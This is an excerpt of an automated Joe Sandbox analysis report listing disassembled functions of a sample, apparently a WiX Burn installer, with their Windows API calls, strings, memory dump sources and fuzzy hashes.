                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                            • API String ID: 2976181284-417918914
                                                            • Opcode ID: 2ae2bae8b79b68512326635ab399776df4cc51e8dfb5c851fed2ad182073ea71
                                                            • Instruction ID: c2761e6fd77bcfd25018bb20f7ceccbda72640170360c0f62344f7694ab37824
                                                            • Opcode Fuzzy Hash: 2ae2bae8b79b68512326635ab399776df4cc51e8dfb5c851fed2ad182073ea71
                                                            • Instruction Fuzzy Hash: AB316F72A4062AAFCF15EE98D885EAEB7B5FB04728B188215F924D7651D330ED108FD1
                                                            Function 00874115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0088A0E8,00000000,00000000,?,00000000,008753BD,00000000,?,?,0087D5B5,?), ref: 00874123
                                                            • GetLastError.KERNEL32(?,0088A0E8,00000000,00000000,?,00000000,008753BD,00000000,?,?,0087D5B5,?,00000000,00000000), ref: 00874131
                                                            • CreateDirectoryW.KERNEL32(?,840F01E8,00875489,?,0088A0E8,00000000,00000000,?,00000000,008753BD,00000000,?,?,0087D5B5,?,00000000), ref: 0087419A
                                                            • GetLastError.KERNEL32(?,0088A0E8,00000000,00000000,?,00000000,008753BD,00000000,?,?,0087D5B5,?,00000000,00000000), ref: 008741A4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: dirutil.cpp
                                                            • API String ID: 1375471231-2193988115
                                                            • Opcode ID: bde721a1a2d5f0cdc8c798dd5364c71277c0157fa6c4de1a9e3cec3b12809abe
                                                            • Instruction ID: b3a817e10b813f4e8b1cf82d266560dd3a3abf71f50f4c14163b26b7491448de
                                                            • Opcode Fuzzy Hash: bde721a1a2d5f0cdc8c798dd5364c71277c0157fa6c4de1a9e3cec3b12809abe
                                                            • Instruction Fuzzy Hash: A711022660433596D7313AA94C40B3BB664FF75B61F91E121FD0CEA248E3A0CC8196B2
                                                            Function 008756A9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00876595,00876595,?,0087563D,?,?,00000000), ref: 008756E5
                                                            • GetLastError.KERNEL32(?,0087563D,?,?,00000000,?,?,00876595,?,00877F02,?,?,?,?,?), ref: 00875714
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareErrorLastString
                                                            • String ID: Failed to compare strings.$variable.cpp$version.dll
                                                            • API String ID: 1733990998-4228644734
                                                            • Opcode ID: 8e9df564d8b213e13e8b0baa499183a3a91ed320d1429c17535e74a78962d5b7
                                                            • Instruction ID: ce37c8e38c03a5e0eef78fe0437555df1765c0c3b312d267d10c553e0d57377f
                                                            • Opcode Fuzzy Hash: 8e9df564d8b213e13e8b0baa499183a3a91ed320d1429c17535e74a78962d5b7
                                                            • Instruction Fuzzy Hash: 4321D736640915EFC7188F98CD45A59BBA4FB457A0B254315E92CEB394E6B0ED018690
                                                            Function 008B0A28 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00874F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 008B0A38
                                                            • GetLastError.KERNEL32(?,?,00874F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008B0A46
                                                            • GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 008B0A8B
                                                            • GetLastError.KERNEL32(?,?,00874F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008B0A95
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CodeExitObjectProcessSingleWait
                                                            • String ID: procutil.cpp
                                                            • API String ID: 590199018-1178289305
                                                            • Opcode ID: 72e4ccceb2186ea347d1457ba538003caa8b71a0f685d4b6d4e4a9cca67c9634
                                                            • Instruction ID: 3f63c049f6dd7e008ebfd4b7818fac772d2b5bdd912da1dde51ec1f432b302c9
                                                            • Opcode Fuzzy Hash: 72e4ccceb2186ea347d1457ba538003caa8b71a0f685d4b6d4e4a9cca67c9634
                                                            • Instruction Fuzzy Hash: AA117C37D4573AABCB209B949D08AEFBBA4FB04760F124665ED54EB380E2748D009AD1
                                                            Function 008909EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0089140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00890A19,?,?,?), ref: 00891434
                                                              • Part of subcall function 0089140C: GetLastError.KERNEL32(?,00890A19,?,?,?), ref: 0089143E
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00890A27
                                                            • GetLastError.KERNEL32 ref: 00890A31
                                                            Strings
                                                            • cabextract.cpp, xrefs: 00890A55
                                                            • Failed to read during cabinet extraction., xrefs: 00890A5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast$PointerRead
                                                            • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                            • API String ID: 2170121939-2426083571
                                                            • Opcode ID: 0e6337b118a24dc79e4ec45096cc979eeb8f900e6c3a48e9644eec78a57be4ff
                                                            • Instruction ID: 15d7d5aadaf65d52588021aadeb0085692c83b16c9d71f0bcf86bed2a95b9c62
                                                            • Opcode Fuzzy Hash: 0e6337b118a24dc79e4ec45096cc979eeb8f900e6c3a48e9644eec78a57be4ff
                                                            • Instruction Fuzzy Hash: 76118E36A4123ABFCB21AF99DC08E9A7BB8FB08760B154255FD14E7251D730D9109AD1
                                                            Function 0089140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00890A19,?,?,?), ref: 00891434
                                                            • GetLastError.KERNEL32(?,00890A19,?,?,?), ref: 0089143E
                                                            Strings
                                                            • cabextract.cpp, xrefs: 00891462
                                                            • Failed to move to virtual file pointer., xrefs: 0089146C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                            • API String ID: 2976181284-3005670968
                                                            • Opcode ID: 8dc440a8f171516563e53b9a1e8f9d6adcfcf8e1ea9c46650d1f918421c09cc1
                                                            • Instruction ID: 34f6bcc577ca14e2cbbc1f2ffcb6774a2ff09121093083cf6558bb2d84aa6a8e
                                                            • Opcode Fuzzy Hash: 8dc440a8f171516563e53b9a1e8f9d6adcfcf8e1ea9c46650d1f918421c09cc1
                                                            • Instruction Fuzzy Hash: D601B13294462A7B8F216A958C08A8BBB25FF047707158125FD28D6210D735D810C6D5
                                                            Function 008B3EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 008B3F73
                                                            • GetLastError.KERNEL32 ref: 008B3FD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastRead
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 1948546556-2967768451
                                                            • Opcode ID: 640996945dbb4abcd8de34e2d582db641003b694e52748ba6390e48054bbc40e
                                                            • Instruction ID: 3a104c248e26fd8ae43edf2b927ef1b37ceac560cc5047c1b8e94a9cad0b6c46
                                                            • Opcode Fuzzy Hash: 640996945dbb4abcd8de34e2d582db641003b694e52748ba6390e48054bbc40e
                                                            • Instruction Fuzzy Hash: DE316D71E00269ABDB21DE58CC40BEAB7B4FB04751F0041AAFA48E7340DBB49EC48A95
                                                            Function 008B4E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,008B3F9A,?,?,?), ref: 008B4E5E
                                                            • GetLastError.KERNEL32(?,?,008B3F9A,?,?,?), ref: 008B4E68
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 442123175-2967768451
                                                            • Opcode ID: 4bf00c86813fe1d1976f74ade034fe8cd9197681945a64ce0c0e940a60a3ba08
                                                            • Instruction ID: 2e1bff82c21ffdc111c32afaad1f237be64742f28c2ab1682bf6ab3267aa2573
                                                            • Opcode Fuzzy Hash: 4bf00c86813fe1d1976f74ade034fe8cd9197681945a64ce0c0e940a60a3ba08
                                                            • Instruction Fuzzy Hash: 55F04B33A00229BBC7209A9A8C46AEFBB6DFB44761F510225FD04E7241E770EA0086E1
                                                            Function 008B490D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00888770,00000000,00000000,00000000,00000000,00000000), ref: 008B4925
                                                            • GetLastError.KERNEL32(?,?,?,00888770,00000000,00000000,00000000,00000000,00000000), ref: 008B492F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 2976181284-2967768451
                                                            • Opcode ID: 38db07a456eba99fb36e57ff821f434b3715cc5b34fcfdff1a3ddb87fde5e713
                                                            • Instruction ID: 5ab4d9fbb614ae93f14ab11e185ca3d3626ace8ea0fc471c14bda51fad8c3e44
                                                            • Opcode Fuzzy Hash: 38db07a456eba99fb36e57ff821f434b3715cc5b34fcfdff1a3ddb87fde5e713
                                                            • Instruction Fuzzy Hash: ADF08176A0012EAB9B208F85DC069AB7FA8FF04760B014155BD54EB321E731DC10D7E1
                                                            Function 00873838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00873877
                                                            • GetLastError.KERNEL32 ref: 00873881
                                                            • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 008738EA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: DirectoryErrorLastLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1230559179-0
                                                            • Opcode ID: 594d9a72d8d0dfd909b2cb4c48822d5751c83ba17942453d56bb153f820acedc
                                                            • Instruction ID: e0ea7203f71a4f355a916848a34a127d113b33a339950ec8a62a4ae720840989
                                                            • Opcode Fuzzy Hash: 594d9a72d8d0dfd909b2cb4c48822d5751c83ba17942453d56bb153f820acedc
                                                            • Instruction Fuzzy Hash: 1A21F8B2D0173EA7DB20DB648C45F9A7B68FB00710F1142B1BE18E7245DA70DE409BD2
                                                            Function 00873A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00873BB6,00000000,?,00871474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008713B8), ref: 00873A20
                                                            • RtlFreeHeap.NTDLL(00000000,?,00873BB6,00000000,?,00871474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008713B8,000001C7,00000100), ref: 00873A27
                                                            • GetLastError.KERNEL32(?,00873BB6,00000000,?,00871474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008713B8,000001C7,00000100,?), ref: 00873A31
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$ErrorFreeLastProcess
                                                            • String ID:
                                                            • API String ID: 406640338-0
                                                            • Opcode ID: e7ae23c9d87ba34429570a3bcaa075c4bc6a83eb2db94f4ad5b0b1648e5a1f65
                                                            • Instruction ID: 4c4a4af6373b02eaa1cbbdc2b3961495643abfecd4b73734bf55ee98a89e1821
                                                            • Opcode Fuzzy Hash: e7ae23c9d87ba34429570a3bcaa075c4bc6a83eb2db94f4ad5b0b1648e5a1f65
                                                            • Instruction Fuzzy Hash: EBD0C273A0053957832117EE5C4D95BBF5CFF00AA17014220FD48D7220D721CC0092E1
                                                            Function 008B0F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID: regutil.cpp
                                                            • API String ID: 71445658-955085611
                                                            • Opcode ID: f7c3c908c8f00f5fe0aa277ccf498b30330f9454b21f44af121fdbaaf9eb3d9a
                                                            • Instruction ID: d94ae3a24e5044d12226f421065e0217f19acb2ac3a576cb7803e92d40f835d2
                                                            • Opcode Fuzzy Hash: f7c3c908c8f00f5fe0aa277ccf498b30330f9454b21f44af121fdbaaf9eb3d9a
                                                            • Instruction Fuzzy Hash: B7F0F633701136669B3005968C05BFBAA59FB947B0B194126BD4AEA3D0EE31CC109EF1
                                                            Function 008AF49A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 008AF491
                                                              • Part of subcall function 008B998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008B9A09
                                                              • Part of subcall function 008B998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008B9A1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: PA@s
                                                            • API String ID: 1269201914-2724485322
                                                            • Opcode ID: 58873d1c957c6a4a721b7fea24cd90c76c1c930616dd5bef55b806fb4aab8b2e
                                                            • Instruction ID: 0909090ca1ebb33b4b26dac8daba9813af23b0b013c6a3570294b6bdf2e9208c
                                                            • Opcode Fuzzy Hash: 58873d1c957c6a4a721b7fea24cd90c76c1c930616dd5bef55b806fb4aab8b2e
                                                            • Instruction Fuzzy Hash: 41B012A127A401BD328851981D13C3B070CF1CAF61731436FF2A0C1382E8840C054037
                                                            Function 008AF4AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 008AF491
                                                              • Part of subcall function 008B998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008B9A09
                                                              • Part of subcall function 008B998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008B9A1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: PA@s
                                                            • API String ID: 1269201914-2724485322
                                                            • Opcode ID: 6420366aa316e3fb8e4bacac90f9c6031b0da17c12bd5f64c065ce2eb5be49b7
                                                            • Instruction ID: f6e03d114cd285ba7267d2618277d76576a273e0b0f16fd80a42c38634a5f912
                                                            • Opcode Fuzzy Hash: 6420366aa316e3fb8e4bacac90f9c6031b0da17c12bd5f64c065ce2eb5be49b7
                                                            • Instruction Fuzzy Hash: 25B012A127A501BC328851981C12C3B070CF1CAF61731836FF2A0C1382E8800C444037
                                                            Function 008AF479 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 008AF491
                                                              • Part of subcall function 008B998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008B9A09
                                                              • Part of subcall function 008B998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008B9A1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: PA@s
                                                            • API String ID: 1269201914-2724485322
                                                            • Opcode ID: 67d36eb8d7332b542a7cff1eef7f5266ce7cce6fbb0b5da68ad63173e0dbaddf
                                                            • Instruction ID: 0c5dca1968f087433bfef8af52bf6fd9cc578d088ba6c1cadf65a22cc2d77540
                                                            • Opcode Fuzzy Hash: 67d36eb8d7332b542a7cff1eef7f5266ce7cce6fbb0b5da68ad63173e0dbaddf
                                                            • Instruction Fuzzy Hash: D2B012A527A401BC324811941C12C3B070CF1C6F61731C36FF6A0C0382A8800C054077
                                                            Function 008B35C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 008B35F8
                                                              • Part of subcall function 008B304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,008B3609,00000000,?,00000000), ref: 008B3069
                                                              • Part of subcall function 008B304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0089C025,?,00875405,?,00000000,?), ref: 008B3075
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandleInitLastModuleVariant
                                                            • String ID:
                                                            • API String ID: 52713655-0
                                                            • Opcode ID: 9d4c83017fdd9e1e06437aa4a91f91f95c6610c085df9366abcb0c465c4e46a4
                                                            • Instruction ID: a44861479e3cfec126e6c4c3e8de54de293d1021a6e259a26e33ea74da9022a3
                                                            • Opcode Fuzzy Hash: 9d4c83017fdd9e1e06437aa4a91f91f95c6610c085df9366abcb0c465c4e46a4
                                                            • Instruction Fuzzy Hash: DF312D76E01629AFCB11DFA8C884ADEB7F8FF09710F01456AED15EB311D6759D008BA4
                                                            Function 008B5870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(80070490,00000000,80070490,008DAAA0,00000000,80070490,?,?,00888B19,WiX\Burn,PackageCache,00000000,008DAAA0,00000000,00000000,80070490), ref: 008B58CA
                                                              • Part of subcall function 008B10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008B112B
                                                              • Part of subcall function 008B10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008B1163
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
